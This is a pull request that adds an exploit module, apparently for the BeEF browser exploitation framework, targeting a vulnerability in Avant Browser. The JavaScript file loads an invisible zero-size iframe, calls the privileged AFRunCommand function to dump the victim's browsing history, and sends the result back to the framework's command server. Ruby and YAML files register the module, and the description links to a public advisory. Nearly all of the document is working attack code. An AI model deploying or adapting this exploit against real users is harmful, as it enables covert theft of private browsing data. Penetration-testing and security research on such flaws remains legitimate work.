### PR TITLE
Avant Browser History Stealing

### DIFF
--- a/modules/exploits/avant_steal_history/command.js
+++ b/modules/exploits/avant_steal_history/command.js
@@ -1,0 +1,51 @@
+//
+//   Copyright 2012 Wade Alcorn wade@bindshell.net
+//
+//   Licensed under the Apache License, Version 2.0 (the "License");
+//   you may not use this file except in compliance with the License.
+//   You may obtain a copy of the License at
+//
+//       http://www.apache.org/licenses/LICENSE-2.0
+//
+//   Unless required by applicable law or agreed to in writing, software
+//   distributed under the License is distributed on an "AS IS" BASIS,
+//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+//   See the License for the specific language governing permissions and
+//   limitations under the License.
+//
+beef.execute(function() {
+
+	
+
+	var avant_iframe = document.createElement("iframe");
+	//var avant_iframe = beef.dom.createInvisibleIframe();
+	avant_iframe.setAttribute('src', "browser:home");
+	avant_iframe.setAttribute('name','test2');
+	avant_iframe.setAttribute('width','0');
+	avant_iframe.setAttribute('heigth','0');
+	avant_iframe.setAttribute('scrolling','no');
+
+	document.body.appendChild(avant_iframe);
+
+	var vstr = {value: ""};
+
+	if(window['test2'].navigator) {
+	//This works if FF is the rendering engine
+	window['test2'].navigator.AFRunCommand(<%= @cId %>, vstr);
+	beef.net.send("<%= @command_url %>", <%= @command_id %>, vstr.value);
+
+	}
+	else {
+	// this works if Chrome is the rendering engine
+	//window['test2'].AFRunCommand(60003, vstr);
+	beef.net.send("<%= @command_url %>", <%= @command_id %>, "Exploit failed. Rendering engine is not set to Firefox");	
+
+	}
+	
+
+	
+
+	
+
+});
+

--- a/modules/exploits/avant_steal_history/config.yaml
+++ b/modules/exploits/avant_steal_history/config.yaml
@@ -1,0 +1,25 @@
+#
+#   Copyright 2012 Wade Alcorn wade@bindshell.net
+#
+#   Licensed under the Apache License, Version 2.0 (the "License");
+#   you may not use this file except in compliance with the License.
+#   You may obtain a copy of the License at
+#
+#       http://www.apache.org/licenses/LICENSE-2.0
+#
+#   Unless required by applicable law or agreed to in writing, software
+#   distributed under the License is distributed on an "AS IS" BASIS,
+#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+#   See the License for the specific language governing permissions and
+#   limitations under the License.
+#
+beef:
+    module:
+        avant_steal_history:
+            enable: true
+            category: ["Exploits", "XSS"]
+            name: "Avant Browser History Stealing"
+            description: "Invoke AFRunCommand() privileged function. The integer 60003 is passed by default to dump the Avant Browser history."
+            authors: ["Roberto Suggi Liverani"]
+            target:
+                working: ["ALL"]

--- a/modules/exploits/avant_steal_history/module.rb
+++ b/modules/exploits/avant_steal_history/module.rb
@@ -1,0 +1,33 @@
+#
+#   Copyright 2012 Wade Alcorn wade@bindshell.net
+#
+#   Licensed under the Apache License, Version 2.0 (the "License");
+#   you may not use this file except in compliance with the License.
+#   You may obtain a copy of the License at
+#
+#       http://www.apache.org/licenses/LICENSE-2.0
+#
+#   Unless required by applicable law or agreed to in writing, software
+#   distributed under the License is distributed on an "AS IS" BASIS,
+#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+#   See the License for the specific language governing permissions and
+#   limitations under the License.
+#
+class Avant_steal_history < BeEF::Core::Command
+
+	def self.options
+
+		configuration = BeEF::Core::Configuration.instance
+		
+
+		return [
+			{'name' => 'cId', 'ui_label' => 'Command ID:', 'value' => '60003', 'type' => 'textarea', 'width' => '400px', 'height' => '25px' }
+		]
+
+	end
+
+	def post_execute
+		save({'result' => @datastore['result']})
+	end
+
+end


### PR DESCRIPTION
Avant Browser History Stealing module which exploits a vulnerability found in the Avant Browser. A detailed security advisory can be found at: http://blog.malerisch.net/2012/12/avant-browser-same-of-origin-policy.html
